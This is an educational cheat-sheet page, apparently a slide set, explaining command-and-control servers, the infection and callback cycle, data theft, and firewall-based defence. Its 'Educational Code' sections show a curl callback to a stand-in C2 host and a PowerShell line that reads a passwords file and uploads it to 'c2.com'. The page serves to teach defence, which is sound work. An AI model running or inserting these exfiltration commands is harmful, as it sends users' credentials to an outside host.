What is C2 server

Leave a Comment / Cheat Sheet / By

The Attack Cycle

This shows the data theft process.

1. Infection

A victim clicks a bad link. The computer downloads malware. The malware hides.

📡

2. Callback

The malware calls the server. The hacker waits there. The hacker sends orders.

🔓

3. Theft

The server gives a command. The malware steals data. The malware locks files.

Ethical Hacker Zone

⚠ Educational Use Only
  • Welcome to this presentation.
  • We study C2 servers today.
  • C2 servers control cyber attacks.
  • We learn attacker methods.
  • This knowledge builds strong defenses.
Security Shield

What is a C2 Server?

  • A C2 server is a hacker base.
  • It sends instructions to computers.
  • It receives stolen data.
  • The Mirai botnet used C2 servers.
  • The botnet controlled smart cameras.
Control Panel

The Infection Process

  • Hackers send bad emails.
  • A victim opens a bad file.
  • The malware installs in secret.
  • The malware calls the C2 server.
  • Experts call this connection the callback.
Infection Chain

Educational Code: Callback

  • Hackers write connection scripts.
  • They hide this web traffic.
  • The malware asks for a task.
// Malware asks for instructions
curl -X GET https://hidden-c2.com/get_task
// Server replies: "Download Keylogger"
Callback Request

Educational Code: Theft

  • Exfiltration means data theft.
  • Hackers steal passwords.
  • They upload the data.
  • They encrypt the data.
  • Firewalls cannot read encrypted data.
# Exfiltration Example
$Data = Get-Content -Path "C:\Passwords.txt"
Invoke-WebRequest -Uri "http://c2.com/upload" -Body $Data
Data Upload

Disruption and Defense

  • Security teams hunt C2 addresses.
  • They block bad IP addresses.
  • The firewall stops the connection.
  • The malware stops working.
  • Monitor your network logs daily.
Firewall Block